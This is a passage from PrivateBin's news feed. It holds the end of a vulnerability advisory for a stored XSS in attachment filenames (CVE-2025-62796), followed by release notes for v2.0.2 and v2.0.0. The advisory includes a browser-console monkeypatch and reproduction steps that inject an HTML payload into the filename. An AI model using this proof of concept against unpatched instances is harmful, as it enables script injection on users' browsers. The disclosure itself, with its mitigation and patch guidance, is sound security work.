&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="k"&gt;if&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nb"&gt;typeof&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;origSetCipherMessage&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;!==&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;function&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
&lt;span class="w"&gt;    &lt;/span&gt;&lt;span class="k"&gt;return&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;console&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;error&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;setCipherMessage not found or is not a function.&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="n"&gt;SI&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;setCipherMessage&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;async&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;function&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cipherMessage&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
&lt;span class="w"&gt;    &lt;/span&gt;&lt;span class="n"&gt;try&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
&lt;span class="w"&gt;      &lt;/span&gt;&lt;span class="o"&gt;//&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;cipherMessage&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;here&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;is&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;the&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;plain&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;object&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;the&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;client&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;intends&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;to&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;encrypt&lt;/span&gt;
&lt;span class="w"&gt;      &lt;/span&gt;&lt;span class="k"&gt;if&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cipherMessage&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nb nb-Type"&gt;Array&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;isArray&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cipherMessage&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;attachment_name&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="n"&gt;console&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;log&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;[patch] original attachment_name:&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;cipherMessage&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;attachment_name&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="n"&gt;cipherMessage&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;attachment_name&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;cipherMessage&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;attachment_name&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;map&lt;/span&gt;&lt;span class="p"&gt;(()&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;=&amp;gt;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;desiredName&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="n"&gt;console&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;log&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;[patch] attachment_name overwritten to:&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;cipherMessage&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;attachment_name&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="w"&gt;      &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;else&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;if&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cipherMessage&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;cipherMessage&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;attachment&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nb nb-Type"&gt;Array&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;isArray&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cipherMessage&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;attachment&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="o"&gt;//&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;if&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;there&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;are&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;attachments&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;but&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;no&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;attachment_name&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;rare&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;add&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;a&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;coherent&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;array&lt;/span&gt;
&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="n"&gt;cipherMessage&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;attachment_name&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;cipherMessage&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;attachment&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;map&lt;/span&gt;&lt;span class="p"&gt;(()&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;=&amp;gt;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;desiredName&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="n"&gt;console&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;log&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;[patch] attachment_name added:&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;cipherMessage&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;attachment_name&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="w"&gt;      &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;else&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="o"&gt;//&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;nothing&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;to&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;change&lt;/span&gt;
&lt;span class="w"&gt;      &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="w"&gt;      &lt;/span&gt;&lt;span class="o"&gt;//&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;call&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;the&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;original&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;implementation&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;which&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;performs&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;the&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;encryption&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="w"&gt;      &lt;/span&gt;&lt;span class="k"&gt;return&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;await&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;origSetCipherMessage&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cipherMessage&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="w"&gt;    &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;catch&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;err&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
&lt;span class="w"&gt;      &lt;/span&gt;&lt;span class="n"&gt;console&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;error&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;Error in setCipherMessage monkeypatch:&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;err&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="w"&gt;      &lt;/span&gt;&lt;span class="o"&gt;//&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="ow"&gt;in&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;case&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;of&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;error&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;attempt&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;to&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;call&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;the&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;original&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;anyway&lt;/span&gt;
&lt;span class="w"&gt;      &lt;/span&gt;&lt;span class="k"&gt;return&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;await&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;origSetCipherMessage&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cipherMessage&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="w"&gt;    &lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="p"&gt;};&lt;/span&gt;

&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="n"&gt;console&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;log&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;Monkeypatch applied to ServerInteraction.setCipherMessage() - ready to send. (Reload the page to undo).&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;})();&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;

&lt;h3&gt;Reproduction Steps&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;Access PrivateBin (in the program scope). A requirement is that you have file upload enabled.&lt;/li&gt;
&lt;li&gt;Attach any file via the UI (file content irrelevant).&lt;/li&gt;
&lt;li&gt;Open the browser console (F12 → Console).&lt;/li&gt;
&lt;li&gt;Paste the snippet above and adjust &lt;code&gt;desiredName&lt;/code&gt; to the desired HTML payload (e.g., &lt;code&gt;"&amp;gt;&amp;lt;meta http-equiv="refresh" content="0;url=https://example.com/"&amp;gt;.txt&lt;/code&gt;).&lt;/li&gt;
&lt;li&gt;Click Create. The client will encrypt and send the paste normally.&lt;/li&gt;
&lt;li&gt;Intercept/inspect the POST request (optional).&lt;/li&gt;
&lt;li&gt;Open the generated link.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;strong&gt;What happens:&lt;/strong&gt; When rendering the paste, the content of the injected attachment_name will be interpreted according to the context, demonstrating the impact.&lt;/p&gt;
&lt;h2&gt;Mitigation&lt;/h2&gt;
&lt;p&gt;We strongly recommend you to &lt;strong&gt;upgrade to our latest release&lt;/strong&gt;. However, here are some workarounds that may help you to mitigate this vulnerability without upgrade:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Update the &lt;a href="https://github.com/PrivateBin/PrivateBin/wiki/Configuration#cspheader"&gt;CSP in your configuration file&lt;/a&gt; to the latest recommended settings and check that it isn't getting reverted or overwritten by your web server, reverse proxy or CDN, i.e. using &lt;a href="https://privatebin.info/directory/check"&gt;our offered check service&lt;/a&gt;.&lt;br/&gt;&lt;strong&gt;Note:&lt;/strong&gt; You should check your CSP independently, even if you upgrade to a fixed version. See also the section &lt;a href="https://github.com/PrivateBin/PrivateBin/security/advisories/GHSA-867c-p784-5q6g#more-information"&gt;"More information"&lt;/a&gt; about how we recently enhanced the CSP protection.&lt;/li&gt;
&lt;li&gt;Deploying PrivateBin on a separate domain may limit the scope of the vulnerability to PrivateBin itself and thus, as described in the "Impact" section, effectively prevent any damage by the vulnerability to other resources you are hosting.&lt;/li&gt;
&lt;li&gt;As explained in the impact assessment, disabling attachments also prevents this issue.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Patches&lt;/h3&gt;
&lt;p&gt;The issue has been patched in version 2.0.2. The change that displayed the attachment name without sanitation was introduced in version 1.7.7. The code-changes in PrivateBin mitigating this issue can be found in commit c4f8482b3072be7ae012cace1b3f5658dcc3b42e.&lt;/p&gt;
&lt;h2&gt;References&lt;/h2&gt;
&lt;p&gt;We highly encourage server administrators and others involved with the PrivateBin project to read-up on how Content-Security-Policies work, especially should you consider to manually adjust it:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://content-security-policy.com/"&gt;https://content-security-policy.com/&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://developer.mozilla.org/docs/Web/HTTP/CSP"&gt;https://developer.mozilla.org/docs/Web/HTTP/CSP&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://developers.google.com/web/fundamentals/security/csp/"&gt;https://developers.google.com/web/fundamentals/security/csp/&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Also please note that if multiple headers are set (as e.g. done via our introduced meta tag) &lt;a href="https://stackoverflow.com/a/51153816/5008962"&gt;browsers should apply the most restrictive set of the policies&lt;/a&gt;, &lt;a href="https://www.w3.org/TR/CSP2/#enforcing-multiple-policies"&gt;as per the CSP specification&lt;/a&gt;.&lt;/p&gt;
&lt;h2&gt;More information&lt;/h2&gt;
&lt;p&gt;This issue is similar to &lt;a href="https://github.com/PrivateBin/PrivateBin/security/advisories/GHSA-cqcc-mm6x-vmvw" title="GHSA-cqcc-mm6x-vmvw"&gt;GHSA-cqcc-mm6x-vmvw&lt;/a&gt;, but was, based on our analysis, apparently introduced in &lt;a href="https://github.com/PrivateBin/PrivateBin/pull/1550"&gt;#1550&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Note that we have, independently as of this issue and as per regular security maintenance, already applied many CSP improvements and strengthened this security mechanism of PrivateBin. This includes in detail:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;As part of the &lt;a href="https://github.com/PrivateBin/PrivateBin/security/advisories/GHSA-867c-p784-5q6g#more-information"&gt;last XSS vulnerability&lt;/a&gt;, we have now included the CSP in a meta HTML tag, too, so in case the headers are somehow mangled with by (reverse) proxies or similar, the PrivateBin instance should still be protected as long as this HTML meta tag is included in an unchanged way.&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/PrivateBin/PrivateBin/pull/1613"&gt;#1613&lt;/a&gt; - We have removed a outdated configuration recommendation, as &lt;code&gt;default-src&lt;/code&gt; does not need to allow &lt;code&gt;self&lt;/code&gt; anymore, but it can keep the more strict &lt;code&gt;none&lt;/code&gt; even when using the bootstrap SVG icons. (&lt;a href="https://bugzilla.mozilla.org/show_bug.cgi?id=1773976"&gt;previously a problem in Firefox prevented this&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/PrivateBin/PrivateBin/pull/1464"&gt;#1464&lt;/a&gt; - We could remove the previously used &lt;code&gt;unsafe-eval&lt;/code&gt; that was a potentially risky CSP source being allowed for scripts, and replaced it with &lt;code&gt;wasm-unsafe-eval&lt;/code&gt; for the streaming of a WebAssembly component used for optional compression. This can be disabled in the configuration and then &lt;code&gt;wasm-unsafe-eval&lt;/code&gt; can also be removed.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In case you have not noticed this and did not upgrade your CSP header yet, &lt;strong&gt;we strongly recommend to do it as soon as possible&lt;/strong&gt;!&lt;/p&gt;
&lt;h2&gt;Credits&lt;/h2&gt;
&lt;p&gt;On Thursday October 23rd, 2025 we received a report via email at &lt;a href="mailto:security@privatebin.org"&gt;security@privatebin.org&lt;/a&gt;. The reporter asked to stay anonymous. We thank them a lot for the detailed reporting of this vulnerability, including the description of the proof of concept listed above!&lt;/p&gt;
&lt;p&gt;In general, we'd like to thank everyone reporting issues and potential vulnerabilities to us.&lt;/p&gt;
&lt;p&gt;If you think you have found a vulnerability or potential security risk, &lt;a href="https://github.com/PrivateBin/PrivateBin/blob/master/SECURITY.md"&gt;we'd kindly ask you to follow our security policy&lt;/a&gt; and report it to us. We then assess the report and will take the actions we deem necessary to address it.&lt;/p&gt;
&lt;h2&gt;Timeline&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;2025-10-23 Received report via email&lt;/li&gt;
&lt;li&gt;2025-10-23 Acknowledged report to sender&lt;/li&gt;
&lt;li&gt;2025-10-24 Discussed and reproduced issue, wrote a unit test case based on this&lt;/li&gt;
&lt;li&gt;2025-10-25 Worked on a patch as well as discussing other potentially problematic spots and applying similar sanitation to those.&lt;/li&gt;
&lt;li&gt;2025-10-28 Released patch with PrivateBin 2.0.2&lt;/li&gt;
&lt;/ul&gt;</content><category term="Reports"/><category term="PrivateBin"/><category term="Security"/></entry><entry><title>Release v2.0.2 - Fix HTML injection/XSS vulnerability in filenames of attached files (CVE-2025-62796)</title><link href="https://privatebin.info/news/v2.0.2-release.html" rel="alternate"/><published>2025-10-28T10:00:00+01:00</published><updated>2025-10-28T10:00:00+01:00</updated><author><name>rugk</name></author><id>tag:privatebin.info,2025-10-28:/news/v2.0.2-release.html</id><summary type="html">&lt;p&gt;This release fixes a security vulnerability that allowed HTML injection/XSS (CVE-2025-62796).&lt;/p&gt;</summary><content type="html">&lt;p&gt;&lt;strong&gt;This release fixes a security vulnerability that allowed HTML injection/XSS (&lt;a href="https://www.cve.org/CVERecord?id=CVE-2025-62796"&gt;CVE-2025-62796&lt;/a&gt;.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The vulnerability allows attackers to inject arbitrary HTML into the filename displayed near the file size hint, when attachments are enabled. This is by definition a XSS vulnerability (CWE-80), in this case even a persistent XSS. As any HTML can be injected, basically, this can e.g. be used to inject a script tag (as per CWE-79).&lt;/p&gt;
&lt;p&gt;This has been mitigated in &lt;a href="https://github.com/PrivateBin/PrivateBin/releases/tag/2.0.2"&gt;PrivateBin 2.0.2&lt;/a&gt;, so we strongly urge users to update.&lt;/p&gt;
&lt;p&gt;More details of the vulnerability, mitigation etc. &lt;a href="https://privatebin.info/reports/vulnerability-2025-10-28.html"&gt;can be found in the vulnerability report&lt;/a&gt;.&lt;/p&gt;
&lt;h2&gt;Changes since v2.0.1&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;CHANGED: Upgrading libraries to: DOMpurify 3.3.0&lt;/li&gt;
&lt;li&gt;CHANGED: Refactored jQuery DOM element creation into plain JavaScript&lt;/li&gt;
&lt;li&gt;FIXED: Sanitize file name in attachment size hint (CVE-2025-62796 / https://github.com/PrivateBin/PrivateBin/security/advisories/GHSA-867c-p784-5q6g)&lt;/li&gt;
&lt;li&gt;FIXED: PHP OPcache module is optional again (#1679)&lt;/li&gt;
&lt;li&gt;FIXED: bootstrap template password peek input group display&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Help wanted &amp;amp; greatly appreciated&lt;/h2&gt;
&lt;p&gt;Apart from the large tasks that require deeper insight and time, there are also &lt;a href="https://github.com/PrivateBin/PrivateBin/issues?q=is%3Aopen+is%3Aissue+label%3A%22help+wanted%22"&gt;smaller issues were help is wanted&lt;/a&gt;, topics &lt;a href="https://github.com/PrivateBin/PrivateBin/issues?utf8=%E2%9C%93&amp;amp;q=is%3Aopen+is%3Aissue+label%3A%22discuss+me%22+"&gt;open to debate&lt;/a&gt; and of course many languages that still remain to be &lt;a href="https://github.com/PrivateBin/PrivateBin/wiki/Translation"&gt;translated&lt;/a&gt;. We are also still looking for additional long term maintainers among our frequent issue helpers.&lt;/p&gt;
&lt;p&gt;What can we offer you in return for your help?&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;We can offer you our mentorship, if this is your first time participating as a maintainer of an open source software project. We can guide you through submitting your first pull requests and work with you to ensure your change fulfils the communities quality standards, gets merged and makes it into a release.&lt;/li&gt;
&lt;li&gt;Your work gets publicly credited. This can help you build up a resume, showing off your growing skill set, in programming as well as your soft skills.&lt;/li&gt;
&lt;li&gt;PrivateBin is a smaller project. If you'd like to learn how to participate and contribute in an open source git project, this should be less overwhelming than larger projects.&lt;/li&gt;
&lt;li&gt;We do have a decent unit test code coverage, so it is an environment forgiving of mistakes. You may still introduce logical flaws or issues in new features, not yet covered in the tests, but you can rely on the tests preventing any regressions in other areas.&lt;/li&gt;
&lt;li&gt;You don't have to be proficient in multiple programming languages, there are a lot of things to improve within either the JavaScript or PHP areas that don't need you to understand the other side, beyond their shared API.&lt;/li&gt;
&lt;li&gt;It can be an opportunity to learn about continuous integration tools to automate tasks like tests, security scans, etc.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If you are interested in helping with any of these points, we have prepared a &lt;a href="https://github.com/PrivateBin/PrivateBin/wiki/Development"&gt;development guide&lt;/a&gt; including design goals, code structure and tools to get you started. For any questions, you can chat with the maintainers in the &lt;a href="https://github.com/PrivateBin/PrivateBin/discussions"&gt;discussion&lt;/a&gt; area or reach us via &lt;a href="mailto:support@privatebin.org"&gt;email&lt;/a&gt;.&lt;/p&gt;</content><category term="News"/><category term="PrivateBin"/><category term="Release"/></entry><entry><title>Release v2.0.0 - Changes configuration defaults &amp; template</title><link href="https://privatebin.info/news/v2.0.0-release.html" rel="alternate"/><published>2025-07-28T10:00:00+02:00</published><updated>2025-07-28T10:00:00+02:00</updated><author><name>El RIDO</name></author><id>tag:privatebin.info,2025-07-28:/news/v2.0.0-release.html</id><summary type="html">&lt;p&gt;This release changes configuration defaults including switching the template and removing legacy features.&lt;/p&gt;</summary><content type="html">&lt;p&gt;&lt;strong&gt;This release changes configuration defaults including switching the template and removing legacy features.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The most notable change is the switch of the default template to &lt;code&gt;bootstrap5&lt;/code&gt;. We switched to use the Jdenticons library by default for the comment creator icons, as it doesn't require the GD library. And we changed the user interface to display SI-prefixes instead of binary bytes for data sizes, to be more consistent with sizes displayed in current operating systems, i.e. 1024 bytes now will be displayed as 1.02 kB instead of 1.00 kiB and refer to "documents" instead of "pastes".&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;page&lt;/code&gt; template and compatibility to pre-v1.3 pastes, including ZeroBin ones, got removed. The &lt;code&gt;v2&lt;/code&gt; paste format which is still currently used, got introduced in release 1.3 in July 2019. This allows dropping further unused database columns, as those were artifacts of the &lt;code&gt;v1&lt;/code&gt; pastes and not used anymore with the &lt;code&gt;v2&lt;/code&gt; ones.&lt;/p&gt;
&lt;h2&gt;Update procedure&lt;/h2&gt;
&lt;p&gt;The minimum required PHP version was increased from 7.3 to 7.4.&lt;/p&gt;
&lt;p&gt;If you have created your own &lt;code&gt;cfg/conf.php&lt;/code&gt; file, please check the following entries and update them accordingly:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;section &lt;code&gt;[main]&lt;/code&gt;, key &lt;code&gt;template&lt;/code&gt;: If set to &lt;code&gt;page&lt;/code&gt; replace this with &lt;code&gt;bootstrap5&lt;/code&gt; or one of the &lt;code&gt;bootstrap&lt;/code&gt; variants (see &lt;a href="https://github.com/PrivateBin/PrivateBin/blob/2.0.0/cfg/conf.sample.php#L60-L63"&gt;&lt;code&gt;cfg/conf.sample.php&lt;/code&gt;&lt;/a&gt;).&lt;/li&gt;
